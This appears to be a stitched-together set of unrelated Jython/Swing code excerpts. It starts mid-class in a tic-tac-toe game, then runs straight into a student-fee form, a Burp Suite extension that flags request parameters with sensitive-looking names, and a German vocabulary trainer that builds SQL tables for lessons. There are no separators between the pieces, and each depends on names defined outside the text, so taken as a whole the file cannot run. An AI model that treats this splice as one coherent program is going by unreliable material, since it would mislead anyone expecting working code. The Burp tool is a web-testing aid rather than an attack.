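        # Game constructor: builds the 3x3 button grid and status bar,
        # shows the window and starts the first round.
        #
        # Parameters:
        #   resources_directory  Directory to look for images and audio
        #                        files; file names are appended to it as-is.
        # NOTE(review): find(...) > 0 ignores a match at position 0 and also
        # matches any platform string that merely contains 'win'.
        is_windows = platform.platform().lower().find('win') > 0
        self.main_window_padding_right = 20 if is_windows else 0
        self.main_window_padding_bottom = 40 if is_windows else 0
        self.resources_directory = resources_directory

        # One handler per cell, listed row by row.
        handlers = [
            self.clicked1, self.clicked2, self.clicked3,
            self.clicked4, self.clicked5, self.clicked6,
            self.clicked7, self.clicked8, self.clicked9
        ]
        image_size = self.tile_size
        self.buttons = []
        for index, handler in enumerate(handlers):
            row, col = divmod(index, self.cells)
            button = JButton("", actionPerformed=handler)
            button.setBounds(col * image_size, row * image_size,
                             image_size, image_size)
            # Keep the button1..button9 attributes available.
            setattr(self, 'button%d' % (index + 1), button)
            self.buttons.append(button)
        self.buttons_mapped = [
            self.buttons[row * self.cells:(row + 1) * self.cells]
            for row in range(self.cells)
        ]

        width = self.tile_size * self.cells
        height = width
        self.frame = JFrame(self.game_title,
                            size=(width, height + self.status_bar_height))
        self.frame.setLocation(200, 100)
        self.frame.setLayout(None)
        for button in self.buttons:
            self.frame.add(button)
        self.status_label = JLabel("")
        self.status_label.setBounds(self.status_bar_margin_left,
                                    height + self.status_bar_margin_top,
                                    width, self.status_bar_height)
        self.frame.add(self.status_label)
        self.frame.setVisible(True)
        self.frame.addWindowListener(self)

        # Shuffle a per-instance copy so the class-level list is not
        # mutated for every other instance.
        self.sounds = list(self.sounds)
        random.shuffle(self.sounds)
        self.restart()

    # Restarts the game: asks for the player character, clears the board
    # and icons, and switches to the next background sound.
    def restart(self):
        self.dizzy = self.choosePlayer()
        self.winner = None
        self.board = [[' ', ' ', ' '], [' ', ' ', ' '], [' ', ' ', ' ']]
        for button in self.buttons:
            button.setIcon(ImageIcon(self.resources_directory + self.blank))
        self.stop_playing_background()
        self.sound = self.play_sound_safe(self.sounds[self.last_sound])
        # Cycle through the available background sounds.
        self.last_sound = (self.last_sound + 1) % len(self.sounds)
        self.status_label.setText(self.welcome_status)

    # Stops playing any background music, if any playing now.
    def stop_playing_background(self):
        if self.sound is not None:
            self.sound.stopPlaying()
            self.sound = None

    def set_dizzy(self, button):
        # Draws Dizzy in a given button, sets game status to "Playing" and
        # plays action sound.
        #
        # Parameters:
        #   button  to set Dizzy icon to.
        button.setIcon(ImageIcon(self.resources_directory + self.dizzy))
        self.status_label.setText(self.in_game_status)
        self.play_sound_safe(self.action_sound)

    def set_mario(self, button):
        # Draws Mario in a given button.
        #
        # Parameters:
        #   button  to set Mario icon to.
        button.setIcon(ImageIcon(self.resources_directory + self.mario))

    def _player_move(self, row, col):
        # Shared body of the nine click handlers: marks the cell for the
        # player, then lets the computer answer.
        #
        # Parameters:
        #   row, col  board coordinates of the clicked cell.
        if self.board[row][col] != ' ':
            return  # cell already taken, ignore the click
        self.board[row][col] = 'X'
        self.set_dizzy(self.buttons_mapped[row][col])
        # If this move completes a line the round is over; do not let the
        # computer place another piece first.
        if self.is_any_line_filled('X'):
            self.test_state()
            return
        self.computer_move()

    def clicked1(self, event):
        # Event listener method for the button of the game at 0x0.
        self._player_move(0, 0)

    def clicked2(self, event):
        # Event listener method for the button of the game at 0x1.
        self._player_move(0, 1)

    def clicked3(self, event):
        # Event listener method for the button of the game at 0x2.
        self._player_move(0, 2)

    def clicked4(self, event):
        # Event listener method for the button of the game at 1x0.
        self._player_move(1, 0)

    def clicked5(self, event):
        # Event listener method for the button of the game at 1x1.
        self._player_move(1, 1)

    def clicked6(self, event):
        # Event listener method for the button of the game at 1x2.
        self._player_move(1, 2)

    def clicked7(self, event):
        # Event listener method for the button of the game at 2x0.
        self._player_move(2, 0)

    def clicked8(self, event):
        # Event listener method for the button of the game at 2x1.
        self._player_move(2, 1)

    def clicked9(self, event):
        # Event listener method for the button of the game at 2x2.
        self._player_move(2, 2)

    # Makes the next move on the board on behalf of the computer.
    def computer_move(self):
        # first move optimization - always start in the middle if possible
        if self.board[1][1] == ' ':
            self.board[1][1] = '0'
            self.set_mario(self.buttons_mapped[1][1])
            self.test_state()
            return
        # Otherwise pick random cells until an empty one is hit.
        while self.has_empty_cell():
            y = random.randint(0, self.cells - 1)
            x = random.randint(0, self.cells - 1)
            if self.board[y][x] == ' ':
                self.board[y][x] = '0'
                self.set_mario(self.buttons_mapped[y][x])
                break
        self.test_state()

    def test_state(self):
        # Tests the board for a winning state.
        # If there is a winner then stops currently playing
        # background sound, creates winning label, plays result
        # sound and notifies/asks the user about continuation.
        if self.is_any_line_filled('X'):
            self.winner = self.dizzy  # dizzy
        elif self.is_any_line_filled('0'):
            self.winner = self.mario  # mario
        elif not self.has_empty_cell():
            self.winner = self.blank  # tie
        if not self.winner:
            return
        self.stop_playing_background()
        if self.winner == self.mario:
            label = 'You lose!'
            self.play_sound_safe(self.lose_sound)
        elif self.winner == self.dizzy:
            label = 'You won!'
            self.play_sound_safe(self.won_sound)
        else:
            label = 'Tie.'
            self.play_sound_safe(self.tie_sound)
        self.notify_and_ask_about_continuation(label)

    def notify_and_ask_about_continuation(self, label):
        # Shows modal window with the result of the game and asks the user
        # whether they want to continue the game.
        # If user answers "Y" or "y" restarts the game.
        # If user answers "N" or "n" closes the game window and frees the
        # resources. Any other answer asks again.
        #
        # Parameters:
        #   label  Game result label.
        self.status_label.setText(label)
        while True:
            answer = str(
                requestString(label + "\r\n" +
                              "Do you want to play again? (Y/N)")).lower()
            if answer == "y":
                self.restart()
                break
            elif answer == "n":
                self.windowClosing(None)
                break

    def is_any_line_filled(self, character):
        # Checks the winning condition for the given character 'X' or '0'.
        #
        # Returns:
        #   Whether the given character has a full row, column or diagonal.
        is_row = self.is_row_filled(character)
        is_col = self.is_col_filled(character)
        is_d1 = self.is_diag_filled1(character)
        is_d2 = self.is_diag_filled2(character)
        return is_row or is_col or is_d1 or is_d2

    def has_empty_cell(self):
        # Checks if the game board contains an empty cell for the next move.
        #
        # Returns:
        #   Whether there is an empty cell on the board.
        for row in self.board:
            if ' ' in row:
                return True
        return False

    def is_row_filled(self, color):
        # Check row win condition.
        #
        # Parameters:
        #   color (string) - mark to look for ('X' or '0')
        # Returns:
        #   True if some row consists only of that mark, else False
        for row in range(len(self.board)):
            count = 0
            for col in range(len(self.board)):
                if self.board[row][col] == color:
                    count = count + 1
            if count == self.cells:
                return True
        return False

    def is_col_filled(self, color):
        # Check column win condition.
        #
        # Parameters:
        #   color (string) - mark to look for ('X' or '0')
        # Returns:
        #   True if some column consists only of that mark, else False
        for col in range(len(self.board)):
            count = 0
            for row in range(len(self.board)):
                if self.board[row][col] == color:
                    count = count + 1
            if count == self.cells:
                return True
        return False

    def is_diag_filled1(self, color):
        # Checks first (top-left to bottom-right) diagonal win condition.
        #
        # Parameters:
        #   color (string) - mark to look for ('X' or '0')
        # Returns:
        #   True if the whole diagonal carries that mark, else False
        count = 0
        for idx in range(len(self.board)):
            if self.board[idx][idx] == color:
                count = count + 1
        return count == self.cells

    def is_diag_filled2(self, color):
        # Checks second (top-right to bottom-left) diagonal win condition.
        #
        # Parameters:
        #   color (string) - mark to look for ('X' or '0')
        # Returns:
        #   True if the whole diagonal carries that mark, else False
        count = 0
        for idx in range(len(self.board)):
            if self.board[idx][self.cells - 1 - idx] == color:
                count = count + 1
        return count == self.cells

    def play_sound_safe(self, sound):
        # Method tries to play given sound catching possible exceptions.
        # For example, if the sound wasn't found in resource directory.
        #
        # Parameters:
        #   sound  string with a file of a sound with leading slash '/'.
        # Returns:
        #   Sound object from makeSound, or None if it could not be made.
        snd = None
        try:
            snd = makeSound(self.resources_directory + sound)
            play(snd)
        except:
            # Deliberately broad: a missing or unreadable sound must never
            # stop the game, whatever the media layer raises.
            showError("Error while playing sound " + str(sound) + ".")
        return snd

    def windowClosing(self, event):
        # Method is invoked when a user closes game window or finishes
        # playing. It is the implementation of WindowAdapter interface.
        #
        # Parameters:
        #   event  final event from Swing/AWT (None when called directly).
        self.stop_playing_background()
        if self.frame is None:
            # Already closed once (e.g. answered "N", then window event).
            return
        self.buttons = []
        self.buttons_mapped = []
        self.button1 = None
        self.button2 = None
        self.button3 = None
        self.button4 = None
        self.button5 = None
        self.button6 = None
        self.button7 = None
        self.button8 = None
        self.button9 = None
        self.status_label = None
        self.frame.getContentPane().removeAll()
        self.frame.dispose()
        self.frame = None

    def choosePlayer(self):
        # Asks the player to pick a character until a known name is given.
        #
        # Returns:
        #   The module-level value (rpenguin, rchrome, ...) that matches the
        #   chosen name; it is later appended to the resources directory to
        #   load the player's icon.
        while True:
            select = requestString(
                "You are against Mario. Choose Your Character: penguin chrome fox fish bird charizard sonic "
            )
            if select is None:
                # No answer given; ask again instead of failing on .lower().
                continue
            selection = select.lower()
            if selection == "penguin":
                return rpenguin
            if selection == "chrome":
                return rchrome
            if selection == "fox":
                return rfox
            if selection == "fish":
                return rfish
            if selection == "bird":
                return rbird
            if selection == "charizard":
                return rcharizard
            if selection == "sonic":
                return rsonic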
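def createStudentFeeForm(stFeeObj):
    """Build and show the "Student Fee" form for one fee record.

    Parameters:
        stFeeObj: object exposing ``studentId``, ``studentName``,
            ``totalAmount``, ``paidAmount`` and ``remainingAmount``.

    Side effects:
        Rebinds the module globals ``frame``, ``tfStudentId``,
        ``tfStudentName``, ``tfTotalAmount``, ``tfPaidAmount`` and
        ``tfRemainingAmount``. The button handlers ``clickPay`` and
        ``clickbtnCancelForm`` are defined outside this excerpt.

    Only the paid-amount field is left editable; the other four are
    read-only.
    """
    global tfStudentId
    global tfStudentName
    global tfTotalAmount
    global tfPaidAmount
    global tfRemainingAmount
    global frame

    frame = JFrame("Student Fee Form ")
    frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE)
    frame.setSize(500, 500)
    frame.setLocation(200, 200)
    frame.setLayout(None)

    panel = JPanel()
    panel.setSize(500, 500)
    panel.setLocation(0, 0)
    panel.setLayout(None)
    panel.setVisible(True)
    panel.setBackground(Color.LIGHT_GRAY)

    heading = JLabel("STUDENT FEE")
    heading.setBounds(200, 30, 150, 40)

    lbStudentId = JLabel(" Student id")
    lbStudentName = JLabel(" student name")
    lbTotalAmount = JLabel("Total Amount ")
    lbPaidAmount = JLabel("Paid Amount")
    lbRemainingAmount = JLabel("Remaining amount")

    tfStudentId = JTextField(str(stFeeObj.studentId))
    tfStudentName = JTextField(str(stFeeObj.studentName))
    tfTotalAmount = JTextField(str(stFeeObj.totalAmount))
    tfPaidAmount = JTextField(str(stFeeObj.paidAmount))
    tfRemainingAmount = JTextField(str(stFeeObj.remainingAmount))

    for readOnlyField in (tfStudentId, tfStudentName, tfTotalAmount,
                          tfRemainingAmount):
        readOnlyField.setEditable(False)

    labels = (lbStudentId, lbStudentName, lbTotalAmount, lbPaidAmount,
              lbRemainingAmount)
    fields = (tfStudentId, tfStudentName, tfTotalAmount, tfPaidAmount,
              tfRemainingAmount)
    # One label/field pair per row, rows 50 px apart starting at y=100.
    for row, (label, field) in enumerate(zip(labels, fields)):
        y = 100 + 50 * row
        label.setBounds(70, y, 130, 30)
        field.setBounds(220, y, 130, 30)

    btnPay = JButton("Paid", actionPerformed=clickPay)
    btnPay.setBounds(350, 410, 100, 40)
    btnCancel = JButton("Cancel", actionPerformed=clickbtnCancelForm)
    btnCancel.setBounds(50, 410, 100, 40)

    panel.add(heading)
    for label in labels:
        panel.add(label)
    for field in fields:
        panel.add(field)
    panel.add(btnPay)
    panel.add(btnCancel)

    frame.add(panel)
    # Show the frame only once it is fully populated; components added to
    # an already visible container are not laid out or painted until the
    # container is revalidated.
    frame.setVisible(True)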
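class BurpExtender(IBurpExtender, ITab, IHttpListener):
    """Burp extension (tab caption "BSPE") that flags request parameters by name.

    For every request seen by the Proxy tool the parameter names are
    collected per location (URL, body, cookie, JSON) and compared with the
    patterns in ``self.sensitiveParamR``. Matching names are shown in the
    tab's text area and new ones are appended to ``sensitive-params.txt``.

    ``getParamRegular``, ``getSensitiveParamsFromFile`` and
    ``paramRegularFile`` are defined outside this class.

    Parameter names come from intercepted traffic and must be treated as
    untrusted text wherever they are stored or displayed.
    """

    # processHttpMessage only looks at Proxy traffic; 4 is
    # IBurpExtenderCallbacks.TOOL_PROXY.
    TOOL_PROXY = 4

    # IParameter type code -> bucket name used in the result dictionaries.
    PARAM_BUCKETS = {
        0: 'urlParams',     # IParameter.PARAM_URL
        1: 'BodyParams',    # IParameter.PARAM_BODY
        2: 'cookieParams',  # IParameter.PARAM_COOKIE
        6: 'jsonParams',    # IParameter.PARAM_JSON
    }

    def registerExtenderCallbacks(self, callbacks):
        """Entry point called by Burp: set up state, the UI tab and the listener."""
        self._callbacks = callbacks
        self._helpers = callbacks.getHelpers()
        callbacks.setExtensionName("burp-sensitive-param-extractor")
        self._stdout = PrintWriter(callbacks.getStdout(), True)
        print('burp-sensitive-param-extractor loaded.\nAuthor:LSA\nhttps://github.com/theLSA/burp-sensitive-param-extractor')

        self.sensitiveParamR = getParamRegular()
        self.requestParamDict = {}
        self.resultSensitiveParamsDict = {}

        self._callbacks.customizeUiComponent(self.getUiComponent())
        self._callbacks.addSuiteTab(self)
        # Register the listener last: processHttpMessage writes to the
        # text area and reads the pattern list, so both must exist before
        # the first request can arrive.
        callbacks.registerHttpListener(self)

    def getTabCaption(self):
        """Return the caption of the suite tab."""
        return 'BSPE'

    def processHttpMessage(self, toolFlag, messageIsRequest, messageInfo):
        """Collect the parameter names of one Proxy request and report matches.

        Responses and traffic from other tools are ignored.
        """
        if not (messageIsRequest and toolFlag == self.TOOL_PROXY):
            return

        requestInfo = self._helpers.analyzeRequest(messageInfo)
        reqUrl = requestInfo.getUrl()
        reqMethod = requestInfo.getMethod()

        # Built locally and published afterwards, so a half-filled
        # dictionary is never visible on the instance.
        requestParams = dict(
            (bucket, []) for bucket in self.PARAM_BUCKETS.values())
        for param in requestInfo.getParameters():
            bucket = self.PARAM_BUCKETS.get(param.getType())
            if bucket is None:
                continue
            paramName = param.getName().strip()
            # Only the name is logged. Values of cookie, body and JSON
            # parameters are typically credentials or session tokens and
            # should not be copied into the extension's output log.
            print("%s: %s" % (bucket, paramName))
            requestParams[bucket].append(paramName)

        self.requestParamDict = requestParams
        self.resultSensitiveParamsDict = self.findSensitiveParam(requestParams)

        hits = [(bucket, names)
                for bucket, names in self.resultSensitiveParamsDict.items()
                if names]
        if hits:
            print("[%s][%s]" % (reqMethod, reqUrl))
            self.outputTxtArea.append(
                "\n------------------------------------------------------\n"
            )
            self.outputTxtArea.append("[%s][%s]\n" % (reqMethod, reqUrl))
            for bucket, names in hits:
                self.outputTxtArea.append("\n" + bucket + "--" + str(names))

        self.write2file()

    def findSensitiveParam(self, requestParamDict):
        """Return the parameter names that match a configured pattern.

        Parameters:
            requestParamDict: bucket name -> list of parameter names.

        Returns:
            dict with the four bucket keys, each holding the matching
            names without duplicates, in first-seen order.

        A one-character pattern must equal the whole name; longer
        patterns match as substrings. Both sides are compared in lower
        case. Empty patterns are skipped, because an empty string is a
        substring of every name and would flag every parameter.
        """
        result = dict((bucket, []) for bucket in self.PARAM_BUCKETS.values())
        for bucket, names in requestParamDict.items():
            found = result.setdefault(bucket, [])
            for reqParam in names:
                lowered = reqParam.lower()
                for spr in self.sensitiveParamR:
                    needle = spr.lower()
                    if not needle:
                        continue
                    if len(needle) == 1:
                        matched = needle == lowered
                    else:
                        matched = needle in lowered
                        if matched:
                            print(spr + ' in ' + reqParam)
                    if matched:
                        if reqParam not in found:
                            found.append(reqParam)
                        break
        return result

    def write2file(self):
        """Append newly seen sensitive names to ``sensitive-params.txt``."""
        known = set(getSensitiveParamsFromFile())
        newNames = []
        for names in self.resultSensitiveParamsDict.values():
            for name in names:
                # The file holds one name per line; a name that carries a
                # line break would add entries of its own, so skip it.
                if '\n' in name or '\r' in name:
                    continue
                if name not in known:
                    known.add(name)
                    newNames.append(name)

        if newNames:
            with open('sensitive-params.txt', 'a') as sps:
                for name in newNames:
                    sps.write('\n' + name)

    def addAndSaveNewParamRegular(self, event):
        """Add the pattern typed in the text field and append it to the pattern file."""
        NewParamRegular = self.addAndSaveNewParamRegularTextField.getText()
        if not NewParamRegular or not NewParamRegular.strip():
            # An empty pattern would match every parameter name.
            self.alertSaveSuccess.showMessageDialog(self.spePanel,
                                                    "paramRegular is empty.")
            return

        if NewParamRegular not in self.sensitiveParamR:
            self.sensitiveParamR.append(NewParamRegular)
            with open(paramRegularFile, 'a') as prf:
                prf.write('\n' + NewParamRegular)
            self.alertSaveSuccess.showMessageDialog(self.spePanel,
                                                    "Add and save success!")
        else:
            # The original passed self.tab here, an attribute this class
            # never sets; the panel is the intended parent component.
            self.alertSaveSuccess.showMessageDialog(self.spePanel,
                                                    "paramRegular existed.")

        self.sensitiveParamsRegularListPanel.setListData(self.sensitiveParamR)
        self.sensitiveParamsRegularListPanel.revalidate()

    def delParamRegular(self, event):
        """Remove the selected patterns and rewrite the pattern file."""
        for selected in self.sensitiveParamsRegularListPanel.getSelectedValuesList():
            self.sensitiveParamR.remove(selected)

        # One pattern per line, no trailing newline.
        with open(paramRegularFile, 'w') as prf:
            prf.write('\n'.join(self.sensitiveParamR))

        self.sensitiveParamsRegularListPanel.setListData(self.sensitiveParamR)
        self.sensitiveParamsRegularListPanel.revalidate()

    def clearRst(self, event):
        """Empty the result text area."""
        self.outputTxtArea.setText("")

    def exportRst(self, event):
        """Write the result text area to a file chosen by the user.

        Nothing is written when the dialog is cancelled or no file is
        selected.
        """
        chooseFile = JFileChooser()
        ret = chooseFile.showDialog(self.logPane, "Choose file")
        if ret != JFileChooser.APPROVE_OPTION:
            return
        selected = chooseFile.getSelectedFile()
        if selected is None:
            return
        filename = selected.getCanonicalPath()
        print("\n" + "Export to : " + filename)
        with open(filename, 'w') as out:
            out.write(self.outputTxtArea.text)

    def getUiComponent(self):
        """Build the tab's panel on first use and return it.

        The panel is built once and reused, so the component customized
        in registerExtenderCallbacks is the one Burp displays and
        ``self.outputTxtArea`` always refers to the visible text area.
        """
        if getattr(self, 'spePanel', None) is not None:
            return self.spePanel

        self.spePanel = JPanel()
        self.spePanel.setBorder(None)
        self.spePanel.setLayout(None)

        # Result log.
        self.logPane = JScrollPane()
        self.outputTxtArea = JTextArea()
        self.outputTxtArea.setFont(Font("Consolas", Font.PLAIN, 12))
        self.outputTxtArea.setLineWrap(True)
        self.logPane.setViewportView(self.outputTxtArea)
        self.spePanel.add(self.logPane)

        self.clearBtn = JButton("Clear", actionPerformed=self.clearRst)
        self.exportBtn = JButton("Export", actionPerformed=self.exportRst)
        self.parentFrm = JFileChooser()
        self.spePanel.add(self.clearBtn)
        self.spePanel.add(self.exportBtn)

        self.logPane.setBounds(20, 50, 800, 600)
        self.clearBtn.setBounds(20, 650, 100, 30)
        self.exportBtn.setBounds(600, 650, 100, 30)

        # Pattern list with its add and delete controls.
        self.sensitiveParamsRegularListPanel = JList(self.sensitiveParamR)
        self.sensitiveParamsRegularListPanel.setVisibleRowCount(
            len(self.sensitiveParamR))

        self.sensitiveParamsRegularListScrollPanel = JScrollPane()
        self.sensitiveParamsRegularListScrollPanel.setViewportView(
            self.sensitiveParamsRegularListPanel)
        self.spePanel.add(self.sensitiveParamsRegularListScrollPanel)
        self.sensitiveParamsRegularListScrollPanel.setBounds(850, 50, 150, 600)

        self.addAndSaveNewParamRegularButton = JButton(
            'add&&save', actionPerformed=self.addAndSaveNewParamRegular)
        self.spePanel.add(self.addAndSaveNewParamRegularButton)
        self.addAndSaveNewParamRegularButton.setBounds(1000, 50, 150, 30)

        self.addAndSaveNewParamRegularTextField = JTextField('NewParamRegular')
        self.spePanel.add(self.addAndSaveNewParamRegularTextField)
        self.addAndSaveNewParamRegularTextField.setBounds(1150, 50, 100, 30)

        self.alertSaveSuccess = JOptionPane()
        self.spePanel.add(self.alertSaveSuccess)

        self.delParamRegularButton = JButton(
            "delete", actionPerformed=self.delParamRegular)
        self.spePanel.add(self.delParamRegularButton)
        self.delParamRegularButton.setBounds(1000, 90, 100, 30)

        return self.spePanel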
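def output(self, value):
    """Handle one message from DialogOS for the vocabulary trainer.

    The message text (``value.getString()``) selects the action:

    * ``"Lexikon"`` - open the dictionary window; the typed German word
      is looked up with ``suche`` and the result is sent back.
    * ``"neue Lektion"`` - open the lesson management window (create,
      load, delete lessons; look up single words).
    * ``"alle Lektionen auflisten"`` - show the feedback window and send
      a grammar that lists the stored lessons.
    * text containing ``"sende"`` - send the words of the named lesson
      that are still marked ``"X"`` (not yet known).
    * anything else - read as ``"<lesson>:<feedback text>"``; the text is
      shown in the feedback window and the symbol of the last word is
      stored.

    Uses names defined outside this method (``stmt``, ``conn``, ``pfad``,
    ``suche``, ``frame_feedback``, ``uebersicht2``, ``feld_feedback``,
    ``random`` and the Swing classes).

    Raises:
        ValueError: if a lesson name that would become part of an SQL
            statement is not a single word of letters, digits and
            underscores.
    """
    import re

    def checked_table_name(name):
        # Lesson names are used as table names. A table name cannot be
        # bound as a "?" parameter, so it is concatenated into the SQL
        # text; it comes from a text field or from the incoming message
        # and therefore has to be restricted to one plain word first.
        if name is None or not re.match(r'\w+\Z', name, re.UNICODE):
            raise ValueError("invalid lesson name: %r" % (name,))
        return name

    eingabe = value.getString()

    if eingabe == "Lexikon":
        # Open the window in which German words can be entered; they are
        # then read out in English.

        def change_text(event):
            text = feld.getText()
            x = suche(text)
            self.send(x)
            frame.visible = False

        frame = JFrame(
            'Woerterbuch',
            defaultCloseOperation=JFrame.EXIT_ON_CLOSE,
            size=(380, 350),
        )
        frame.setLayout(None)
        frame.visible = True

        hintergrund = ImageIcon("Hintergrund.jpg")
        hintergrundlabel = JLabel(hintergrund)
        frame.setContentPane(hintergrundlabel)

        uebersetzerlabel = JLabel()
        # 25, 25, 112 is the #191970 used in the HTML labels. The
        # original literal 025 is octal in Python 2 and evaluates to 21.
        uebersetzerlabel.setForeground(Color(25, 25, 112))
        uebersetzerlabel.setText(
            "<html><font size=+1>Welches Wort soll ich uebersetzen?</font></html>"
        )
        uebersetzerlabel.setBounds(10, 20, 500, 50)
        frame.add(uebersetzerlabel)

        feld = JTextField()
        feld.setText("")
        feld.setBounds(20, 80, 300, 25)
        frame.add(feld)

        button = JButton('Uebersetzen',
                         actionPerformed=change_text,
                         size=(10, 20))
        button.setBounds(20, 110, 300, 30)
        frame.add(button)

    # elif, not a second if: otherwise "Lexikon" also ran the final else
    # branch below and failed on eingabe.split(":")[1].
    elif eingabe == "neue Lektion":
        # Open the window for managing lessons.

        def auflisten_in(ort):
            # Show the sorted lesson names, one per line, in `ort`.
            with open(pfad, "r") as f:
                liste_mit_Lektionen = sorted(line.strip() for line in f)
            ort.setText("".join(lektion + "\n"
                                for lektion in liste_mit_Lektionen))
            ort.setFont(Font("Verdana", Font.BOLD, 15))

        def lektion_vermerken(name):
            # Append the lesson name to the lesson file unless its text
            # already occurs there (substring test, as in the original).
            with open(pfad, "r") as f:
                test = f.read()
            if not name in test:
                with open(pfad, "a") as f:
                    f.write(name + "\n")

        def vokabel_einfuegen(name, deutsch, englisch, symbol):
            # The values are bound as parameters; only the checked table
            # name is part of the SQL text.
            sql = "INSERT INTO " + name + " (deutsch, englisch, symbol) VALUES(?,?,?);"
            pstmt = conn.prepareStatement(sql)
            pstmt.setString(1, deutsch)
            pstmt.setString(2, englisch)
            pstmt.setString(3, symbol)
            pstmt.executeUpdate()

        def tabelle_leeren_ab(count):
            # Blank both columns from row `count` down to the first empty
            # row, without reading past the last table row.
            while (count < tabelle.getRowCount()
                   and tabelle.getValueAt(count, 0) is not None):
                tabelle.setValueAt(None, count, 0)
                tabelle.setValueAt(None, count, 1)
                count += 1

        def uebersetzen(event):
            # Look up one word and store it in the newest
            # "nachgeschlagen_<n>" lesson; a new lesson is started when
            # none exists or the newest one already holds 50 words.
            frage = feld_frage.getText()
            x = suche(frage)
            feld_frage.setText(x)

            liste = []
            with open(pfad, "r") as lektionen:
                for lektion in lektionen:
                    if "nachgeschlagen" in lektion:
                        liste.append(lektion)

            neue_tabelle = True
            if liste:
                # Lines read from the file still end with a newline.
                name = checked_table_name(liste[-1].strip())
                anzahl = 0
                zeile = stmt.executeQuery(
                    "SELECT deutsch, englisch, symbol FROM " + name)
                while zeile.next():
                    anzahl += 1
                if anzahl < 50:
                    neue_tabelle = False
                else:
                    nummer = int(name.split("_")[1].strip()) + 1
                    name = "nachgeschlagen_" + str(nummer)
            else:
                name = "nachgeschlagen_1"

            if neue_tabelle:
                # NOTE(review): the listing is whitespace-collapsed; the
                # CREATE TABLE is read as unconditional here, as in
                # erstelle_Lektionstabelle - confirm against the file.
                lektion_vermerken(name)
                stmt.execute("CREATE TABLE " + name +
                             " (deutsch text, englisch text, symbol text);")
            vokabel_einfuegen(name, frage, x, "X")
            auflisten_in(uebersicht)

        def delete(event):
            # Drop the lesson named in the text field and remove it from
            # the lesson file.
            name = checked_table_name(feld.getText())
            # self.geladen is only set once a lesson has been loaded.
            if name == getattr(self, "geladen", None):
                tabelle_leeren_ab(0)
            stmt.execute("DROP TABLE " + name + ";")

            lektionen = []
            with open(pfad, "r") as f:
                for line in f:
                    lektion = line.strip()
                    if not name == lektion:
                        lektionen.append(lektion)
            with open(pfad, "w") as f:
                for lektion in lektionen:
                    f.write(lektion + "\n")
            auflisten_in(uebersicht)

        def laden(event):
            # Load the lesson named in the text field into the table.
            name = checked_table_name(feld.getText())
            self.geladen = name
            results = stmt.executeQuery(
                "SELECT deutsch, englisch FROM " + name)
            count = 0
            while count < tabelle.getRowCount() and results.next():
                tabelle.setValueAt(results.getString("deutsch"), count, 0)
                tabelle.setValueAt(results.getString("englisch"), count, 1)
                count += 1
            # Clear rows left over from a previously loaded lesson.
            tabelle_leeren_ab(count)

        def erstelle_Lektionstabelle(event):
            # Save the table as the lesson named in the text field. An
            # existing lesson of that name is replaced, which also resets
            # every word to "X".
            reihen = []
            for i in range(0, 50):
                deutsch = tabelle.getValueAt(i, 0)
                englisch = tabelle.getValueAt(i, 1)
                if deutsch is None:
                    break
                reihen.append([deutsch, englisch, "X"])

            name = checked_table_name(feld.getText())
            sql = "CREATE TABLE " + name + " (deutsch text, englisch text, symbol text);"
            try:
                stmt.execute(sql)
            except SQLError:
                # NOTE(review): SQLError is not defined in this excerpt -
                # confirm it is the exception the JDBC driver raises.
                stmt.execute("DROP TABLE " + name + ";")
                stmt.execute(sql)

            for reihe in reihen:
                print(reihe)
                vokabel_einfuegen(name, reihe[0], reihe[1], reihe[2])

            lektion_vermerken(name)
            self.send(name)
            frame.setVisible(False)

        frame = JFrame('Vokabel Listen',
                       defaultCloseOperation=JFrame.EXIT_ON_CLOSE,
                       size=(1000, 1000))
        frame.setLayout(None)

        label_enter = JLabel()
        label_enter.setText(
            "<html><font size=+0.5 color = 000000>Bitte vor dem Speichern<br>die Entertaste bedienen</font></html>"
        )
        label_enter.setBounds(20, 720, 250, 50)

        uebersichtLabel = JLabel()
        uebersichtLabel.setText(
            "<html><font size=+1 color=#191970>Bereits vorhandene Lektionen:</font></html>"
        )
        uebersichtLabel.setBounds(450, 230, 250, 50)

        uebersicht = JTextArea()
        uebersicht.editable = False
        uebersicht_scroll = JScrollPane(uebersicht)
        uebersicht_scroll.viewport.view = uebersicht
        uebersicht_scroll.setBounds(450, 300, 250, 380)
        auflisten_in(uebersicht)

        button = JButton('Lektion speichern/Lektion reseten',
                         actionPerformed=erstelle_Lektionstabelle,
                         size=(10, 20))
        button.setBounds(20, 700, 300, 30)
        button_laden = JButton('vorhandene Lektion laden',
                               actionPerformed=laden,
                               size=(10, 20))
        button_laden.setBounds(20, 110, 210, 30)
        button_delete = JButton("Lektion entfernen", actionPerformed=delete)
        button_delete.setBounds(20, 140, 210, 30)

        hintergrund = ImageIcon("Hintergrund.jpg")
        hintergrundlabel = JLabel(hintergrund)
        frame.setContentPane(hintergrundlabel)

        lektionsnamensLabel = JLabel()
        lektionsnamensLabel.setForeground(Color(25, 25, 112))
        lektionsnamensLabel.setText(
            "<html><font size=+1>Hier bitte Namen der Lektion eingeben<br>(Nur ein Wort lang)</font></html>"
        )
        lektionsnamensLabel.setBounds(10, 20, 500, 50)
        frame.add(lektionsnamensLabel)

        feld = JTextField()
        feld.setText("")
        feld.setBounds(20, 80, 210, 25)
        frame.add(feld)

        column_names = [
            "<html><font size=+1 color=#191970><b>Deutsch</b></font></html>",
            "<html><font size=+1 color=#191970><b>Englisch</b></font></html>"
        ]
        table_model = DefaultTableModel(column_names, 50)
        tabelle = JTable(table_model)

        scrollbar = JScrollPane(tabelle)
        scrollbar.viewport.view = tabelle
        scrollbar.setVerticalScrollBarPolicy(
            scrollbar.VERTICAL_SCROLLBAR_ALWAYS)
        scrollbar.setVisible(True)
        tabelle.setVisible(True)
        scrollbar.setBounds(20, 190, 300, 490)

        feld_frage = JTextField()
        feld_frage.setText("")
        feld_frage.setBounds(450, 30, 300, 50)

        uebersetzerlabel = JLabel()
        uebersetzerlabel.setForeground(Color(25, 25, 112))
        uebersetzerlabel.setText(
            "<html><font size=+1>Hier kannst Du ein deutsches Wort eintragen,<br>dass ich fuer Dich nachschlage</font></html>"
        )
        uebersetzerlabel.setBounds(450, 80, 500, 50)

        button_uebersetzen = JButton('Uebersetzen',
                                     actionPerformed=uebersetzen,
                                     size=(10, 20))
        button_uebersetzen.setBounds(450, 130, 300, 30)

        frame.add(button_uebersetzen)
        frame.add(uebersetzerlabel)
        frame.add(feld_frage)
        frame.add(feld)
        frame.add(scrollbar)
        frame.add(button)
        frame.add(button_laden)
        frame.setVisible(True)
        frame.add(uebersicht_scroll)
        frame.add(uebersichtLabel)
        frame.add(button_delete)
        frame.add(label_enter)

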